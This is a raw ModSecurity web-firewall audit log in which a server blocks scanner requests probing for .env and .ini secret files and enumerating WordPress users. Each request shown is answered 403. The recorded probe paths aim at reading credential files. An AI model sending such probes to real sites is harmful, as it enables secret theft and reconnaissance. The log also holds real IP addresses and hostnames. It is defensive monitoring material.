103.236.140.4 X-Forwarded-For: 196.251.116.155 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --10fe6d4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10fe6d4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749738767829072 902 (- - -) Stopwatch2: 1749738767829072 902; combined=403, p1=363, p2=0, p3=0, p4=0, p5=40, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10fe6d4a-Z-- --650e570a-A-- [12/Jun/2025:22:09:54 +0700] aErtwmDP2O-J0msTyvXT0gAAAIs 103.236.140.4 41216 103.236.140.4 8181 --650e570a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.138.181 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.138.181 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --650e570a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --650e570a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749740994917159 724 (- - -) Stopwatch2: 1749740994917159 724; combined=326, p1=293, p2=0, p3=0, p4=0, p5=33, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --650e570a-Z-- --3db5c943-A-- [12/Jun/2025:23:08:55 +0700] aEr7l_iOwnjCOc5ARoXLIgAAAAk 103.236.140.4 60134 103.236.140.4 8181 --3db5c943-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.231.243.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.231.243.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3db5c943-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3db5c943-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749744535681201 2554 (- - -) Stopwatch2: 1749744535681201 2554; combined=1215, p1=475, p2=712, p3=0, p4=0, p5=27, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3db5c943-Z-- --20aacc50-A-- [12/Jun/2025:23:34:06 +0700] aEsBfqF10OasdbQdujg9hAAAANA 103.236.140.4 59482 103.236.140.4 8181 --20aacc50-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 46.101.111.185 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 46.101.111.185 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --20aacc50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --20aacc50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749746046081578 699 (- - -) Stopwatch2: 1749746046081578 699; combined=256, p1=222, p2=0, p3=0, p4=0, p5=34, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20aacc50-Z-- --d650bf1d-A-- [12/Jun/2025:23:44:43 +0700] aEsD-2DP2O-J0msTyvVAyAAAAJM 103.236.140.4 54970 103.236.140.4 8181 --d650bf1d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.72 Accept-Charset: utf-8 --d650bf1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d650bf1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749746683653647 1337 (- - -) Stopwatch2: 1749746683653647 1337; combined=684, p1=620, p2=0, p3=0, p4=0, p5=64, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d650bf1d-Z-- --2491f106-A-- [12/Jun/2025:23:59:16 +0700] aEsHZPiOwnjCOc5ARoX57QAAAAs 103.236.140.4 35446 103.236.140.4 8181 --2491f106-B-- GET /config/php.ini HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.54.229.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.54.229.46 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Cache-Control: no-store Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,fr;q=0.6 --2491f106-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2491f106-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749747556321543 2176 (- - -) Stopwatch2: 1749747556321543 2176; combined=1017, p1=474, p2=509, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2491f106-Z-- --0dddd40b-A-- [12/Jun/2025:23:59:23 +0700] aEsHa_iOwnjCOc5ARoX6CwAAABc 103.236.140.4 35742 103.236.140.4 8181 --0dddd40b-B-- GET /config.ini HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.54.229.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.54.229.46 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Cache-Control: no-store Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,fr;q=0.6 --0dddd40b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0dddd40b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749747563798937 2110 (- - -) Stopwatch2: 1749747563798937 2110; combined=780, p1=389, p2=367, p3=0, p4=0, p5=24, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0dddd40b-Z-- --4160776e-A-- [13/Jun/2025:00:05:37 +0700] aEsI4fiOwnjCOc5ARoX_nQAAABg 103.236.140.4 49752 103.236.140.4 8181 --4160776e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre Accept-Charset: utf-8 --4160776e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4160776e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749747937072176 764 (- - -) Stopwatch2: 1749747937072176 764; combined=360, p1=322, p2=0, p3=0, p4=0, p5=38, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4160776e-Z-- --567b985e-A-- [13/Jun/2025:00:42:47 +0700] aEsRl_iOwnjCOc5ARoUf4AAAAAA 103.236.140.4 47968 103.236.140.4 8181 --567b985e-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 143.110.213.72 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 143.110.213.72 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --567b985e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --567b985e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749750167659346 913 (- - -) Stopwatch2: 1749750167659346 913; combined=329, p1=291, p2=0, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --567b985e-Z-- --b8f68d7f-A-- [13/Jun/2025:01:31:50 +0700] aEsdFmDP2O-J0msTyvWbqwAAAI0 103.236.140.4 42036 103.236.140.4 8181 --b8f68d7f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.94.227.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.94.227.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b8f68d7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8f68d7f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749753110563325 3543 (- - -) Stopwatch2: 1749753110563325 3543; combined=1409, p1=452, p2=913, p3=0, p4=0, p5=44, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8f68d7f-Z-- --d87cf237-A-- [13/Jun/2025:02:10:37 +0700] aEsmLcCW7vAFWQIjJpz0HAAAAE4 103.236.140.4 42282 103.236.140.4 8181 --d87cf237-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 164.92.244.132 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 164.92.244.132 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --d87cf237-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d87cf237-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749755437651989 809 (- - -) Stopwatch2: 1749755437651989 809; combined=322, p1=291, p2=0, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d87cf237-Z-- --acd79535-A-- [13/Jun/2025:02:17:10 +0700] aEsntviOwnjCOc5ARoU2jAAAAAI 103.236.140.4 56058 103.236.140.4 8181 --acd79535-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 206.81.24.227 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 206.81.24.227 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --acd79535-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acd79535-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749755830795745 844 (- - -) Stopwatch2: 1749755830795745 844; combined=375, p1=337, p2=0, p3=0, p4=0, p5=38, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acd79535-Z-- --c2327046-A-- [13/Jun/2025:02:31:32 +0700] aEsrFPiOwnjCOc5ARoU3zwAAAAw 103.236.140.4 59844 103.236.140.4 8181 --c2327046-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 138.122.148.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 138.122.148.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2327046-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2327046-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749756692252301 3266 (- - -) Stopwatch2: 1749756692252301 3266; combined=1397, p1=454, p2=906, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2327046-Z-- --3fbd7045-A-- [13/Jun/2025:02:52:11 +0700] aEsv68CW7vAFWQIjJpz6jAAAAEw 103.236.140.4 37830 103.236.140.4 8181 --3fbd7045-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-N950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --3fbd7045-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fbd7045-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749757931451652 831 (- - -) Stopwatch2: 1749757931451652 831; combined=323, p1=286, p2=0, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fbd7045-Z-- --40e8c836-A-- [13/Jun/2025:03:24:29 +0700] aEs3ff8ql0QLmijbYWaRgwAAAFc 103.236.140.4 38102 103.236.140.4 8181 --40e8c836-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 107.200.165.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 107.200.165.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --40e8c836-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40e8c836-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749759869093872 3445 (- - -) Stopwatch2: 1749759869093872 3445; combined=1437, p1=516, p2=892, p3=0, p4=0, p5=29, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40e8c836-Z-- --b509c862-A-- [13/Jun/2025:03:29:19 +0700] aEs4n_8ql0QLmijbYWaRmwAAAEA 103.236.140.4 38158 103.236.140.4 8181 --b509c862-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 222.252.12.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 222.252.12.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b509c862-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b509c862-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749760159197053 3243 (- - -) Stopwatch2: 1749760159197053 3243; combined=1406, p1=542, p2=835, p3=0, p4=0, p5=29, sr=141, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b509c862-Z-- --053f0444-A-- [13/Jun/2025:03:36:02 +0700] aEs6MsmhAKaFi0V9-ROmJAAAAMM 103.236.140.4 38198 103.236.140.4 8181 --053f0444-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.230.233.156 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.230.233.156 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --053f0444-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --053f0444-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749760562703068 953 (- - -) Stopwatch2: 1749760562703068 953; combined=345, p1=311, p2=0, p3=0, p4=0, p5=34, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --053f0444-Z-- --8a86ee1b-A-- [13/Jun/2025:04:13:24 +0700] aEtC9P8ql0QLmijbYWaSPAAAAE4 103.236.140.4 38748 103.236.140.4 8181 --8a86ee1b-B-- GET /.c9/metadata/environment/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; POT-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36 Accept-Charset: utf-8 --8a86ee1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a86ee1b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749762804959956 901 (- - -) Stopwatch2: 1749762804959956 901; combined=409, p1=371, p2=0, p3=0, p4=0, p5=38, sr=151, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a86ee1b-Z-- --1e274c1b-A-- [13/Jun/2025:04:13:46 +0700] aEtDCv8ql0QLmijbYWaSPgAAAE8 103.236.140.4 38752 103.236.140.4 8181 --1e274c1b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3890.0 Safari/537.36 Accept-Charset: utf-8 --1e274c1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e274c1b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749762826665897 894 (- - -) Stopwatch2: 1749762826665897 894; combined=398, p1=360, p2=0, p3=0, p4=0, p5=38, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: 